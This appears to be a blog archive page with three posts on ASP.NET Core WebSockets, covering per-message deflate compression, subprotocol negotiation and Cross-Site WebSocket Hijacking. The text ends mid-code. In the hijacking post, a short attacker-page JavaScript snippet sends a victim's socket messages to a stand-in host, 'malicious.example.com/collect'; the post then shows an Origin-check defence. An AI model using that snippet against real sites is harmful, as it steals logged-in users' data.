This is my third post about the WebSocket protocol in ASP.NET Core. Previously I've written about subprotocol negotiation and Cross-Site WebSocket Hijacking. The subject I'm focusing on here is per-message compression, which is supported out of the box by Chrome, Firefox and other browsers.

WebSocket Extensions

The WebSocket protocol has a concept of extensions, which can provide new capabilities. An extension can define any additional functionality which is able to work on top of the WebSocket framing layer. The specification reserves three bits of the header (RSV1, RSV2 and RSV3) and all opcodes from 3 to 7 and 11 to 15 for use by extensions (it also allows using the reserved bits to create additional opcodes or even using some of the payload data for that purpose). The extensions (similarly to subprotocols) are negotiated through a dedicated header (Sec-WebSocket-Extensions) as part of the handshake. A client can advertise the supported extensions by putting the list into the header and the server can accept one or more in exactly the same way.
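For example, a client offering the permessage-deflate extension (covered later in this post) and a server accepting it would exchange headers similar to these (an illustrative handshake fragment):

GET /socket HTTP/1.1
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits

HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Extensions: permessage-deflate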

There are two extensions I have heard of: A Multiplexing Extension for WebSockets and Compression Extensions for WebSocket. The first one has never gone beyond a draft, but the second has become a standard and has been adopted by several browsers.

WebSocket Per-Message Compression Extensions

The Compression Extensions for WebSocket standard defines two things. The first is a framework for adding compression functionality to the WebSocket protocol. The framework is really simple; it states only two things:

  • A Per-Message Compression Extension operates only on message data (so compression takes place before splitting into frames and decompression takes place after all frames have been received).
  • A Per-Message Compression Extension allocates the RSV1 bit and calls it the Per-Message Compressed bit. The bit is supposed to be set to 1 on the first frame of a compressed message.

The challenging part is the allocation of the RSV1 bit. It makes it impossible to implement support for per-message compression on top of the WebSocket stack available in ASP.NET Core. Because of that I've decided to roll my own implementation of IHttpWebSocketFeature. It is very similar to the one provided by Microsoft.AspNetCore.WebSockets, and the underlying WebSocket implementation is based on ManagedWebSocket so closely that the needed changes can be described in its context (the key difference is that my implementation is stripped of the client-specific logic as it is not needed).
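To show where such a custom implementation plugs in, here is a minimal sketch of a middleware swapping the feature (CompressionWebSocketFeature is a hypothetical name used only for this illustration; the actual middleware in the repository is more involved):

public class CompressionWebSocketMiddleware
{
    private readonly RequestDelegate _next;

    public CompressionWebSocketMiddleware(RequestDelegate next)
    {
        _next = next ?? throw new ArgumentNullException(nameof(next));
    }

    public Task Invoke(HttpContext context)
    {
        IHttpUpgradeFeature upgradeFeature = context.Features.Get<IHttpUpgradeFeature>();

        if (upgradeFeature != null)
        {
            // From now on HttpContext.WebSockets.AcceptWebSocketAsync hands out a
            // CompressionWebSocket (via the hypothetical feature implementation)
            // instead of the default one.
            context.Features.Set<IHttpWebSocketFeature>(
                new CompressionWebSocketFeature(context, upgradeFeature));
        }

        return _next(context);
    }
}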

From the public API perspective there must be a way to set and get the information that a message is compressed. The first can be achieved with an overload of the SendAsync method (or rather extending the current SendAsync with one more parameter and providing an overload which doesn't need it).

internal class CompressionWebSocket : WebSocket
{
    public override Task SendAsync(ArraySegment<byte> buffer, WebSocketMessageType messageType,
        bool endOfMessage, CancellationToken cancellationToken)
    {
        return SendAsync(buffer, messageType, false, endOfMessage, cancellationToken);
    }

    public Task SendAsync(ArraySegment<byte> buffer, WebSocketMessageType messageType, bool compressed,
        bool endOfMessage, CancellationToken cancellationToken)
    {
        ...;
    }
}

The information about a received message can be exposed through a derived WebSocketReceiveResult.

public class CompressionWebSocketReceiveResult : WebSocketReceiveResult
{
    public bool Compressed { get; }

    public CompressionWebSocketReceiveResult(int count, WebSocketMessageType messageType,
        bool compressed, bool endOfMessage)
        : base(count, messageType, endOfMessage)
    {
        Compressed = compressed;
    }

    public CompressionWebSocketReceiveResult(int count, WebSocketMessageType messageType,
        bool endOfMessage, WebSocketCloseStatus? closeStatus, string closeStatusDescription)
        : base(count, messageType, endOfMessage, closeStatus, closeStatusDescription)
    {
        Compressed = false;
    }
}

The next step is adjusting the internals of the WebSocket implementation to properly write and read the RSV1 bit. The writing part is handled by the WriteHeader method. This method needs to be changed so that it sets the RSV1 bit when the message is compressed and the current frame is not a continuation.

private static int WriteHeader(WebSocketMessageOpcode opcode, byte[] sendBuffer,
    ArraySegment<byte> payload, bool compressed, bool endOfMessage)
{
    sendBuffer[0] = (byte)opcode;

    if (compressed && (opcode != WebSocketMessageOpcode.Continuation))
    {
        sendBuffer[0] |= 0x40;
    }

    if (endOfMessage)
    {
        sendBuffer[0] |= 0x80;
    }

    ...
}

After this change all the paths leading to the WriteHeader method must be changed to either pass down the value of the compressed parameter from SendAsync or provide false.

The receiving flow has a corresponding method, TryParseMessageHeaderFromReceiveBuffer, which fills out a MessageHeader struct. A different version of that struct is needed.

[StructLayout(LayoutKind.Auto)]
internal struct CompressionWebSocketMessageHeader
{
    internal WebSocketMessageOpcode Opcode { get; set; }

    internal bool Compressed { get; set; }

    internal bool Fin { get; set; }

    internal long PayloadLength { get; set; }

    internal int Mask { get; set; }
}

The TryParseMessageHeaderFromReceiveBuffer method will require two changes. One will take care of reading the RSV1 bit and the second will change the validation of the RSV bits' values (per the protocol specification an invalid combination of RSV bits must fail the connection).

private bool TryParseMessageHeaderFromReceiveBuffer(out CompressionWebSocketMessageHeader resultHeader)
{
    var header = new CompressionWebSocketMessageHeader();

    header.Opcode = (WebSocketMessageOpcode)(_receiveBuffer[_receiveBufferOffset] & 0xF);
    header.Compressed = (_receiveBuffer[_receiveBufferOffset] & 0x40) != 0;
    header.Fin = (_receiveBuffer[_receiveBufferOffset] & 0x80) != 0;

    bool reservedSet = (_receiveBuffer[_receiveBufferOffset] & 0x70) != 0;
    bool reservedExceptCompressedSet = (_receiveBuffer[_receiveBufferOffset] & 0x30) != 0;

    ...

    bool shouldFail = (!header.Compressed && reservedSet) || reservedExceptCompressedSet;

    ...
}

The last step is to modify the InternalReceiveAsync method so it skips UTF-8 validation for compressed messages and properly creates a CompressionWebSocketReceiveResult.

private async Task<WebSocketReceiveResult> InternalReceiveAsync(ArraySegment<byte> payloadBuffer,
    CancellationToken cancellationToken)
{
    ...

    try
    {
        while (true)
        {
            ...

            if ((header.Opcode == WebSocketMessageOpcode.Text) && !header.Compressed
                && !TryValidateUtf8(
                    new ArraySegment<byte>(payloadBuffer.Array, payloadBuffer.Offset, bytesToCopy),
                    header.Fin, _utf8TextState))
            {
                await CloseWithReceiveErrorAndThrowAsync(WebSocketCloseStatus.InvalidPayloadData,
                    WebSocketError.Faulted, cancellationToken).ConfigureAwait(false);
            }

            _lastReceiveHeader = header;
            return new CompressionWebSocketReceiveResult(
                bytesToCopy,
                header.Opcode == WebSocketMessageOpcode.Text ?
                    WebSocketMessageType.Text : WebSocketMessageType.Binary,
                header.Compressed,
                bytesToCopy == 0 || (header.Fin && header.PayloadLength == 0));
        }
    }
    catch (Exception ex)
    {
        ...
    }
    finally
    {
        ...
    }
}

With those changes in place the WebSocket implementation has support for the per-message compression framework. Support for a specific compression extension can be implemented on top of that.

Deflate based PMCE

The second thing which the Compression Extensions for WebSocket standard defines is the permessage-deflate compression extension. This extension specifies a way of compressing the message payload using the DEFLATE algorithm with the help of a byte boundary alignment method. But first it is worth implementing the concepts which are shared by all potential compression extensions: receiving and sending the message payload. The methods responsible for handling those operations should be able to properly concatenate or split the message into frames.

public abstract class WebSocketCompressionProviderBase
{
    private readonly int? _sendSegmentSize;

    ...

    protected async Task SendMessageAsync(WebSocket webSocket, byte[] message,
        WebSocketMessageType messageType, bool compressed, CancellationToken cancellationToken)
    {
        if (webSocket.State == WebSocketState.Open)
        {
            if (_sendSegmentSize.HasValue && (_sendSegmentSize.Value < message.Length))
            {
                int messageOffset = 0;
                int messageBytesToSend = message.Length;

                while (messageBytesToSend > 0)
                {
                    int messageSegmentSize = Math.Min(_sendSegmentSize.Value, messageBytesToSend);
                    ArraySegment<byte> messageSegment = new ArraySegment<byte>(message, messageOffset,
                        messageSegmentSize);

                    messageOffset += messageSegmentSize;
                    messageBytesToSend -= messageSegmentSize;

                    await SendAsync(webSocket, messageSegment, messageType, compressed,
                        (messageBytesToSend == 0), cancellationToken);
                }
            }
            else
            {
                ArraySegment<byte> messageSegment = new ArraySegment<byte>(message, 0, message.Length);

                await SendAsync(webSocket, messageSegment, messageType, compressed, true,
                    cancellationToken);
            }
        }
    }

    private Task SendAsync(WebSocket webSocket, ArraySegment<byte> messageSegment,
        WebSocketMessageType messageType, bool compressed, bool endOfMessage,
        CancellationToken cancellationToken)
    {
        if (compressed)
        {
            CompressionWebSocket compressionWebSocket = (webSocket as CompressionWebSocket)
            ?? throw new InvalidOperationException($"Used WebSocket must be CompressionWebSocket.");

            return compressionWebSocket.SendAsync(messageSegment, messageType, true, endOfMessage,
                cancellationToken);
        }
        else
        {
            return webSocket.SendAsync(messageSegment, messageType, endOfMessage, cancellationToken);
        }
    }

    protected async Task<byte[]> ReceiveMessagePayloadAsync(WebSocket webSocket,
        WebSocketReceiveResult webSocketReceiveResult, byte[] receivePayloadBuffer)
    {
        byte[] messagePayload = null;

        if (webSocketReceiveResult.EndOfMessage)
        {
            messagePayload = new byte[webSocketReceiveResult.Count];
            Array.Copy(receivePayloadBuffer, messagePayload, webSocketReceiveResult.Count);
        }
        else
        {
            // The receive buffer is reused for every frame, so each segment must be copied out
            // eagerly - a deferred Concat over the buffer would only see the last frame's bytes.
            IEnumerable<byte> webSocketReceivedBytesEnumerable =
                receivePayloadBuffer.Take(webSocketReceiveResult.Count).ToArray();

            while (!webSocketReceiveResult.EndOfMessage)
            {
                webSocketReceiveResult = await webSocket.ReceiveAsync(
                    new ArraySegment<byte>(receivePayloadBuffer), CancellationToken.None);
                webSocketReceivedBytesEnumerable = webSocketReceivedBytesEnumerable
                    .Concat(receivePayloadBuffer.Take(webSocketReceiveResult.Count).ToArray());
            }

            messagePayload = webSocketReceivedBytesEnumerable.ToArray();
        }

        return messagePayload;
    }
}

With this base the permessage-deflate specifics can be implemented. Let's start with the byte boundary alignment method. In practice it boils down to two operations:

  • In case of a compression operation the compressed data should end with an empty DEFLATE block, and the last four octets of that block should be removed.
  • In case of a decompression operation the last four octets of an empty DEFLATE block should be appended to the received payload before decompression.

It looks like in the case of compressing with the DeflateStream provided by .NET the empty DEFLATE block is always there, so the above can be implemented with two helper methods.

public sealed class WebSocketDeflateCompressionProvider : WebSocketCompressionProviderBase
{
    private static readonly byte[] LAST_FOUR_OCTETS = new byte[] { 0x00, 0x00, 0xFF, 0xFF };
    ...

    private byte[] TrimLastFourOctetsOfEmptyNonCompressedDeflateBlock(byte[] compressedMessagePayload)
    {
        int lastFourOctetsOfEmptyNonCompressedDeflateBlockPosition = 0;
        for (int position = compressedMessagePayload.Length - 1; position >= 4; position--)
        {
            if ((compressedMessagePayload[position - 3] == LAST_FOUR_OCTETS[0])
                && (compressedMessagePayload[position - 2] == LAST_FOUR_OCTETS[1])
                && (compressedMessagePayload[position - 1] == LAST_FOUR_OCTETS[2])
                && (compressedMessagePayload[position] == LAST_FOUR_OCTETS[3]))
            {
                lastFourOctetsOfEmptyNonCompressedDeflateBlockPosition = position - 3;
                break;
            }
        }
        Array.Resize(ref compressedMessagePayload, lastFourOctetsOfEmptyNonCompressedDeflateBlockPosition);

        return compressedMessagePayload;
    }

    private byte[] AppendLastFourOctetsOfEmptyNonCompressedDeflateBlock(byte[] compressedMessagePayload)
    {
        Array.Resize(ref compressedMessagePayload, compressedMessagePayload.Length + 4);

        compressedMessagePayload[compressedMessagePayload.Length - 4] = LAST_FOUR_OCTETS[0];
        compressedMessagePayload[compressedMessagePayload.Length - 3] = LAST_FOUR_OCTETS[1];
        compressedMessagePayload[compressedMessagePayload.Length - 2] = LAST_FOUR_OCTETS[2];
        compressedMessagePayload[compressedMessagePayload.Length - 1] = LAST_FOUR_OCTETS[3];

        return compressedMessagePayload;
    }
}

The second set of helper methods which will be needed is the actual compression and decompression. For simplicity, only text messages will be considered from this point.

public sealed class WebSocketDeflateCompressionProvider : WebSocketCompressionProviderBase
{
    ...
    private static readonly Encoding UTF8_WITHOUT_BOM = new UTF8Encoding(false);

    ...

    private async Task<byte[]> CompressTextWithDeflateAsync(string message)
    {
        byte[] compressedMessagePayload = null;

        using (MemoryStream compressedMessagePayloadStream = new MemoryStream())
        {
            using (DeflateStream compressedMessagePayloadCompressStream =
                new DeflateStream(compressedMessagePayloadStream, CompressionMode.Compress))
            {
                using (StreamWriter compressedMessagePayloadCompressWriter =
                    new StreamWriter(compressedMessagePayloadCompressStream, UTF8_WITHOUT_BOM))
                {
                    await compressedMessagePayloadCompressWriter.WriteAsync(message);
                }
            }

            compressedMessagePayload = compressedMessagePayloadStream.ToArray();
        }

        return compressedMessagePayload;
    }

    private async Task<string> DecompressTextWithDeflateAsync(byte[] compressedMessagePayload)
    {
        string message = null;

        using (MemoryStream compressedMessagePayloadStream = new MemoryStream(compressedMessagePayload))
        {
            using (DeflateStream compressedMessagePayloadDecompressStream =
                new DeflateStream(compressedMessagePayloadStream, CompressionMode.Decompress))
            {
                using (StreamReader compressedMessagePayloadDecompressReader =
                    new StreamReader(compressedMessagePayloadDecompressStream, UTF8_WITHOUT_BOM))
                {
                    message = await compressedMessagePayloadDecompressReader.ReadToEndAsync();
                }
            }
        }

        return message;
    }
}

Now the public API can be exposed.

public interface IWebSocketCompressionProvider
{
    Task CompressTextMessageAsync(WebSocket webSocket, string message,
        CancellationToken cancellationToken);

    Task<string> DecompressTextMessageAsync(WebSocket webSocket,
        WebSocketReceiveResult webSocketReceiveResult, byte[] receivePayloadBuffer);
}

public sealed class WebSocketDeflateCompressionProvider :
    WebSocketCompressionProviderBase, IWebSocketCompressionProvider
{
    ...

    public override async Task CompressTextMessageAsync(WebSocket webSocket, string message,
        CancellationToken cancellationToken)
    {
        byte[] compressedMessagePayload = await CompressTextWithDeflateAsync(message);

        compressedMessagePayload =
            TrimLastFourOctetsOfEmptyNonCompressedDeflateBlock(compressedMessagePayload);

        await SendMessageAsync(webSocket, compressedMessagePayload, WebSocketMessageType.Text, true,
            cancellationToken);
    }

    public override async Task<string> DecompressTextMessageAsync(WebSocket webSocket,
        WebSocketReceiveResult webSocketReceiveResult, byte[] receivePayloadBuffer)
    {
        string message = null;

        CompressionWebSocketReceiveResult compressionWebSocketReceiveResult =
            webSocketReceiveResult as CompressionWebSocketReceiveResult;

        if ((compressionWebSocketReceiveResult != null) && compressionWebSocketReceiveResult.Compressed)
        {
            byte[] compressedMessagePayload =
                await ReceiveMessagePayloadAsync(webSocket, webSocketReceiveResult, receivePayloadBuffer);

            compressedMessagePayload =
                AppendLastFourOctetsOfEmptyNonCompressedDeflateBlock(compressedMessagePayload);

            message = await DecompressTextWithDeflateAsync(compressedMessagePayload);
        }
        else
        {
            byte[] messagePayload =
                await ReceiveMessagePayloadAsync(webSocket, webSocketReceiveResult, receivePayloadBuffer);

            message = Encoding.UTF8.GetString(messagePayload);
        }

        return message;
    }

    ...
}

This API makes it easy to plug a compression provider into the typical (SendAsync and ReceiveAsync based) flow for a WebSocket by replacing calls to SendAsync with calls to CompressTextMessageAsync and calling DecompressTextMessageAsync whenever the WebSocketReceiveResult acquired from ReceiveAsync indicates a text message. But before this can be done the permessage-deflate extension must be properly negotiated.
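For illustration, a minimal receive/send loop using the provider could look like this (a sketch: webSocket, receivePayloadBuffer and compressionProvider are assumed to already exist, and HandleMessage is a hypothetical application callback):

WebSocketReceiveResult result = await webSocket.ReceiveAsync(
    new ArraySegment<byte>(receivePayloadBuffer), CancellationToken.None);

while (result.MessageType != WebSocketMessageType.Close)
{
    if (result.MessageType == WebSocketMessageType.Text)
    {
        // Handles both compressed and uncompressed messages transparently.
        string message = await compressionProvider.DecompressTextMessageAsync(webSocket, result,
            receivePayloadBuffer);

        string response = HandleMessage(message);

        // Compresses the payload and sends it with the Per-Message Compressed bit set.
        await compressionProvider.CompressTextMessageAsync(webSocket, response,
            CancellationToken.None);
    }

    result = await webSocket.ReceiveAsync(
        new ArraySegment<byte>(receivePayloadBuffer), CancellationToken.None);
}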

Context takeover and LZ77 window size

An important part of compression extension negotiation are the parameters. The permessage-deflate extension defines four of them: server_no_context_takeover, client_no_context_takeover, server_max_window_bits and client_max_window_bits. The first two define whether the server and/or client can reuse the same context (LZ77 sliding window) for subsequent messages. The remaining two allow for limiting the LZ77 sliding window size. The sad truth is that the above implementation is not able to handle most of these parameters properly, so the negotiation process needs to make sure that acceptable values are being used, or the negotiation fails (a failed negotiation doesn't fail the connection; the handshake response simply doesn't list the extension as an accepted one). So what are the acceptable values for this implementation?

The DeflateStream doesn't provide control over the LZ77 sliding window size, which means that the negotiation must be failed if the offer contains the server_max_window_bits parameter as it can't be handled. At the same time the presence of client_max_window_bits should be ignored as this is just a hint that the client supports this parameter.

When it comes to the context reuse, the above implementation creates a new DeflateStream for every message, which means it always works in "no context takeover" mode. Because of that the negotiation response must prevent the client from reusing the context - the client_no_context_takeover parameter must always be included in the response. This also means that server_no_context_takeover sent by the client in the offer can always be accepted.
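The rules above boil down to something like the following highly simplified sketch (this is not the actual WebSocketCompressionService code; it assumes the offer string contains a single permessage-deflate entry and ignores parameter values):

private static string NegotiatePerMessageDeflate(string offer)
{
    // DeflateStream gives no control over the LZ77 window size, so this offer can't be honored.
    if (offer.Contains("server_max_window_bits"))
    {
        return null;
    }

    string response = "permessage-deflate";

    // The implementation never reuses the compression context, so accepting this is free.
    if (offer.Contains("server_no_context_takeover"))
    {
        response += "; server_no_context_takeover";
    }

    // The client must not assume context takeover either.
    response += "; client_no_context_takeover";

    // The client_max_window_bits hint is simply ignored.
    return response;
}

A null result simply means the Sec-WebSocket-Extensions header is not included in the handshake response.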

I'm skipping the actual negotiation code here. Despite being based on the NameValueWithParametersHeaderValue class, which handles all the parsing, it is still quite lengthy (it also must validate the parameters for "technical correctness"). For anyone who is interested, the implementation is split between the WebSocketCompressionService and WebSocketDeflateCompressionOptions classes which can be found on GitHub (link below).

Trying this out

There was an issue in the Microsoft.AspNetCore.WebSockets repository for implementing per-message compression. It's currently closed, so I've made this implementation available independently on GitHub and NuGet. It is also part of my WebSocket demo project if somebody is looking for a ready-to-use playground.

In my previous post I've written about subprotocols in the WebSocket protocol. This time I want to focus on the Cross-Site WebSocket Hijacking vulnerability.

Cross-Site WebSocket Hijacking

The WebSocket protocol is not subject to the same-origin policy. The specification states that "Servers that are not intended to process input from any web page but only for certain sites SHOULD verify the |Origin| field is an origin they expect.". This means that the browser will allow any page to open a WebSocket connection.

Let's imagine a scenario in which the application is sending sensitive data over a WebSocket and authentication is based on cookies which are sent as part of the initial handshake. In such a case, if a user visits a malicious page while being logged into the application, that page can open an authenticated WebSocket connection because the browser will automatically send all the cookies. This is a quite common and (if not protected against) dangerous scenario. There are also more "interesting" scenarios possible, like this case of remote code execution.
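For example, a purely illustrative snippet running on the attacker's page (the host names are made up) could look like this:

// Script on https://malicious.example.com - the browser will still attach
// the victim application's cookies to this handshake.
var hijackedSocket = new WebSocket('wss://victim-app.example.com/socket');

hijackedSocket.onmessage = function (message) {
    // Forward whatever sensitive data the server pushes over the socket to the attacker.
    fetch('https://malicious.example.com/collect', { method: 'POST', body: message.data });
};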

Protecting against CSWSH

Protection against CSWSH is easy to implement. As the Origin header is a required part of the initial handshake, the application should check its value against a list of acceptable origins and, if it's not there, respond with the 403 Forbidden status code. The sample from my previous post was using WebSocketConnectionsMiddleware for handling the connections, which makes it a perfect place to add this check.

public class WebSocketConnectionsOptions
{
    public HashSet<string> AllowedOrigins { get; set; }
}

public class WebSocketConnectionsMiddleware
{
    private WebSocketConnectionsOptions _options;
    ...

    public WebSocketConnectionsMiddleware(RequestDelegate next, WebSocketConnectionsOptions options, ...)
    {
        _options = options ?? throw new ArgumentNullException(nameof(options));
        ...
    }

    public async Task Invoke(HttpContext context)
    {
        if (context.WebSockets.IsWebSocketRequest)
        {
            if (ValidateOrigin(context))
            {
                ...
            }
            else
            {
                context.Response.StatusCode = StatusCodes.Status403Forbidden;
            }
        }
        else
        {
            context.Response.StatusCode = StatusCodes.Status400BadRequest;
        }
    }

    private bool ValidateOrigin(HttpContext context)
    {
        return (_options.AllowedOrigins == null)
            || (_options.AllowedOrigins.Count == 0)
            || (_options.AllowedOrigins.Contains(context.Request.Headers["Origin"].ToString()));
    }

    ...
}

Now the list of acceptable origins can be passed during the middleware registration.

public class Startup
{
    ...

    public void Configure(IApplicationBuilder app)
    {
        ...

        WebSocketConnectionsOptions webSocketConnectionsOptions = new WebSocketConnectionsOptions
        {
            AllowedOrigins = new HashSet<string> { "http://localhost:63290" }
        };

        ...
        app.UseWebSockets();
        app.Map("/socket", branchedApp =>
        {
            branchedApp.UseMiddleware<WebSocketConnectionsMiddleware>(webSocketConnectionsOptions);
        });
        ...
    }
}

I've extended the demo available at GitHub with this functionality.

WebSocket is the closest API to a network socket available in the browser. This makes it probably the most flexible transport which a web application can use. That flexibility comes at a price. From the WebSocket perspective the message content is opaque; it only provides a distinction between text and binary data. There is also no ready-to-use mechanism for communicating additional metadata. This means that client and server must agree on an application subprotocol. This isn't problematic as long as the scenario is simple, but the moment there are clients which are not in our control and we want to evolve the subprotocol, a problem arises. WebSocket provides a solution for this problem in the form of a simple subprotocol negotiation mechanism, and the Microsoft.AspNetCore.WebSockets package, which provides low-level WebSocket support for ASP.NET Core, fully supports it.

Sample scenario

The sample scenario will be a very simple web application which regularly receives plain text messages over a WebSocket and displays them to users. The relevant part of the client-side code is the snippet below.

var handleWebSocketPlainTextData = function(data) {
    ...
};

var webSocket = new WebSocket('ws://example.com/socket');

webSocket.onmessage = function(message) {
    handleWebSocketPlainTextData(message.data);
};

On the server side there is a simple middleware which manages WebSocket connections.

public class WebSocketConnectionsMiddleware
{
    private IWebSocketConnectionsService _connectionsService;

    public WebSocketConnectionsMiddleware(RequestDelegate next,
        IWebSocketConnectionsService connectionsService)
    {
        _connectionsService = connectionsService ??
            throw new ArgumentNullException(nameof(connectionsService));
    }

    public async Task Invoke(HttpContext context)
    {
        if (context.WebSockets.IsWebSocketRequest)
        {
            WebSocket webSocket = await context.WebSockets.AcceptWebSocketAsync();

            WebSocketConnection webSocketConnection = new WebSocketConnection(webSocket);

            _connectionsService.AddConnection(webSocketConnection);

            byte[] webSocketBuffer = new byte[1024 * 4];
            WebSocketReceiveResult webSocketReceiveResult = await webSocket.ReceiveAsync(
                new ArraySegment<byte>(webSocketBuffer), CancellationToken.None);
            if (webSocketReceiveResult.MessageType != WebSocketMessageType.Close)
            {
                ...
            }
            await webSocket.CloseAsync(webSocketReceiveResult.CloseStatus.Value,
                webSocketReceiveResult.CloseStatusDescription, CancellationToken.None);

            _connectionsService.RemoveConnection(webSocketConnection.Id);
        }
        else
        {
            context.Response.StatusCode = 400;
        }
    }
}

The IWebSocketConnectionsService implementation manages connections with the help of a ConcurrentDictionary, and WebSocketConnection is a wrapper around the WebSocket class which abstracts the low-level aspects of the API.
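The connection service itself is not listed in this post; a minimal sketch of its shape (my assumption, based on the AddConnection and RemoveConnection calls in the middleware above; SendToAllAsync is a hypothetical broadcast method) could be:

public interface IWebSocketConnectionsService
{
    void AddConnection(WebSocketConnection connection);

    void RemoveConnection(Guid connectionId);

    Task SendToAllAsync(string message, CancellationToken cancellationToken);
}

public class WebSocketConnectionsService : IWebSocketConnectionsService
{
    private readonly ConcurrentDictionary<Guid, WebSocketConnection> _connections =
        new ConcurrentDictionary<Guid, WebSocketConnection>();

    public void AddConnection(WebSocketConnection connection)
    {
        _connections.TryAdd(connection.Id, connection);
    }

    public void RemoveConnection(Guid connectionId)
    {
        _connections.TryRemove(connectionId, out _);
    }

    public Task SendToAllAsync(string message, CancellationToken cancellationToken)
    {
        // Broadcasts to every tracked connection.
        return Task.WhenAll(_connections.Values
            .Select(connection => connection.SendAsync(message, cancellationToken)));
    }
}

And the WebSocketConnection wrapper itself: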

public class WebSocketConnection
{
    private WebSocket _webSocket;

    // Generate the identifier once; an expression-bodied property would return a new Guid on every access.
    public Guid Id { get; } = Guid.NewGuid();

    public WebSocketConnection(WebSocket webSocket)
    {
        _webSocket = webSocket ?? throw new ArgumentNullException(nameof(webSocket));
    }

    public async Task SendAsync(string message, CancellationToken cancellationToken)
    {
        if (_webSocket.State == WebSocketState.Open)
        {
            // Text frames must carry UTF-8 encoded payload, and the segment length
            // must be the byte count (not the string length).
            byte[] messageBytes = Encoding.UTF8.GetBytes(message);
            ArraySegment<byte> buffer = new ArraySegment<byte>(messageBytes, 0, messageBytes.Length);

            await _webSocket.SendAsync(buffer, WebSocketMessageType.Text, true, cancellationToken);
        }
    }

    ...
}

The goal is to introduce a new (JSON based) subprotocol which will allow sending additional metadata, but backward compatibility is also required.

Abstracting the subprotocol

First an abstraction of a subprotocol is needed. The abstraction needs to provide the name of the subprotocol and methods for sending/receiving. In general the application will still be sending text-based messages, so the following interface should be sufficient.

public interface ITextWebSocketSubprotocol
{
    string SubProtocol { get; }

    Task SendAsync(string message, WebSocket webSocket, CancellationToken cancellationToken);

    ...
}

The implementation for the plain text version can be extracted from WebSocketConnection.

public class PlainTextWebSocketSubprotocol : ITextWebSocketSubprotocol
{
    public string SubProtocol => "aspnetcore-ws.plaintext";

    public async Task SendAsync(string message, WebSocket webSocket,
        CancellationToken cancellationToken)
    {
        if (webSocket.State == WebSocketState.Open)
        {
            // Text frames must carry UTF-8 encoded payload, and the segment length
            // must be the byte count (not the string length).
            byte[] messageBytes = Encoding.UTF8.GetBytes(message);
            ArraySegment<byte> buffer = new ArraySegment<byte>(messageBytes, 0, messageBytes.Length);

            await webSocket.SendAsync(buffer, WebSocketMessageType.Text, true, cancellationToken);
        }
    }

    ...
}

This means that WebSocketConnection should now be dependent on the subprotocol abstraction.

public class WebSocketConnection
{
    private WebSocket _webSocket;
    private ITextWebSocketSubprotocol _subProtocol;

    // Generate the identifier once; an expression-bodied property would return a new Guid on every access.
    public Guid Id { get; } = Guid.NewGuid();

    public WebSocketConnection(WebSocket webSocket, ITextWebSocketSubprotocol subProtocol)
    {
        _webSocket = webSocket ?? throw new ArgumentNullException(nameof(webSocket));
        _subProtocol = subProtocol ?? throw new ArgumentNullException(nameof(subProtocol));
    }

    public Task SendAsync(string message, CancellationToken cancellationToken)
    {
        return _subProtocol.SendAsync(message, _webSocket, cancellationToken);
    }

    ...
}

Also a small adjustment to the middleware is needed.

public class WebSocketConnectionsMiddleware
{
    private readonly ITextWebSocketSubprotocol _defaultSubProtocol;
    private IWebSocketConnectionsService _connectionsService;

    public WebSocketConnectionsMiddleware(RequestDelegate next,
        IWebSocketConnectionsService connectionsService)
    {
        _defaultSubProtocol = new PlainTextWebSocketSubprotocol();
        _connectionsService = connectionsService ??
            throw new ArgumentNullException(nameof(connectionsService));
    }

    public async Task Invoke(HttpContext context)
    {
        if (context.WebSockets.IsWebSocketRequest)
        {
            WebSocket webSocket = await context.WebSockets.AcceptWebSocketAsync();

            WebSocketConnection webSocketConnection = new WebSocketConnection(webSocket,
                _defaultSubProtocol);

            ...
        }
        else
        {
            context.Response.StatusCode = 400;
        }
    }
}

Now the infrastructure needed for introducing a second subprotocol is in place. It will be a JSON-based subprotocol which, in addition to the message, provides a timestamp.

public class JsonWebSocketSubprotocol : ITextWebSocketSubprotocol
{
    public string SubProtocol => "aspnetcore-ws.json";

    public async Task SendAsync(string message, WebSocket webSocket,
        CancellationToken cancellationToken)
    {
        if (webSocket.State == WebSocketState.Open)
        {
            string jsonMessage = JsonConvert.SerializeObject(new {
                message,
                timestamp = DateTime.UtcNow
            });

            // The serialized JSON can contain non-ASCII characters, so it must be encoded as UTF-8
            // and the segment length must be the byte count (not the string length).
            byte[] jsonMessageBytes = Encoding.UTF8.GetBytes(jsonMessage);
            ArraySegment<byte> buffer = new ArraySegment<byte>(jsonMessageBytes, 0, jsonMessageBytes.Length);

            await webSocket.SendAsync(buffer, WebSocketMessageType.Text, true, cancellationToken);
        }
    }
}
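For reference, a message serialized by this subprotocol would look along these lines (the values are purely illustrative):

{"message":"Hello from the server","timestamp":"2017-09-15T10:30:00.0000000Z"}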

Subprotocol negotiation

The subprotocol negotiation starts on the client side. As part of the WebSocket object constructor an array of supported subprotocols can be provided. If the negotiation succeeds, the information about the chosen subprotocol is available through the protocol attribute of the WebSocket instance.

var handleWebSocketPlainTextData = function(data) {
    ...
};

var handleWebSocketJsonData = function(data) {
    ...
};

var webSocket = new WebSocket('ws://example.com/socket',
    ['aspnetcore-ws.plaintext', 'aspnetcore-ws.json']);

webSocket.onmessage = function(message) {
    if (webSocket.protocol == 'aspnetcore-ws.json') {
        handleWebSocketJsonData(message.data);
    } else {
        handleWebSocketPlainTextData(message.data);
    }
};

The advertised subprotocols are transferred to the server as part of the connection handshake in the Sec-WebSocket-Protocol header. On the server side this list is available through the HttpContext.WebSockets.WebSocketRequestedProtocols property. The server completes the handshake by providing the name of the selected subprotocol as a parameter to the HttpContext.WebSockets.AcceptWebSocketAsync method.
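In terms of raw headers, the negotiation from the snippets in this post would look similar to this (an illustrative handshake fragment):

GET /socket HTTP/1.1
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Protocol: aspnetcore-ws.plaintext, aspnetcore-ws.json

HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Protocol: aspnetcore-ws.json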

The rules of subprotocol negotiation are simple. If the client has advertised a list of subprotocols the server must choose one of them. If the client hasn't advertised any subprotocols the server can't provide a subprotocol name as part of the handshake. The best place to implement those rules seems to be the middleware.

There is also no way for the client to specify a preference between subprotocols; the choice is entirely up to the server. In the code below the available subprotocols are kept as a list and the order of that list represents preference.

public class WebSocketConnectionsMiddleware
{
    private readonly ITextWebSocketSubprotocol _defaultSubProtocol;
    private readonly IList<ITextWebSocketSubprotocol> _supportedSubProtocols;
    private IWebSocketConnectionsService _connectionsService;

